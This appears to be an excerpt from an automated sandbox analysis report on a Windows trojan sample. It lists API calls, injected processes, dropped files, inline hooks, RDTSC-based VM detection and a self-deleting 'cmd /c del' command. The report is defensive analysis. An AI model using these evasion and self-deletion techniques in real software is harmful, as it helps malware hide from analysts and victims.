          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DE79A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: String function: 00A2B150 appears 72 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 046AB150 appears 72 times
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A350 NtCreateFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A400 NtReadFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A480 NtClose,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A34A NtCreateFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A3FB NtReadFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A47B NtClose,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A10 NtQuerySection,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69560 NtWriteFile,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A696D0 NtCreateKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA400 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA480 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA34A NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA3FB NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA47B NtClose,
          Source: nji3Lg1ot6.exe, 00000000.00000003.290866251.000000000333F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000000.00000003.291883164.00000000031A6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345282700.0000000000CAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345433443.0000000000EAF000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs nji3Lg1ot6.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: nji3Lg1ot6.exeVirustotal: Detection: 37%
          Source: nji3Lg1ot6.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\user\Desktop\nji3Lg1ot6.exeJump to behavior
          Source: nji3Lg1ot6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAD.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_72FB1000 push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E9E6 push edx; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00416B6D push ebx; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4F2 push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4FB push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4A5 push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D55C push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EEB5 push esi; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DE9E6 push edx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006D6B6D push ebx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4FB push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4F2 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4A5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD55C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEEB5 push esi; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE0
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6788Thread sleep time: -56000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6720Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI coverage: 7.9 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 7.4 %
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EB1E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019E90A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EC4C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EBCF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EC0E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
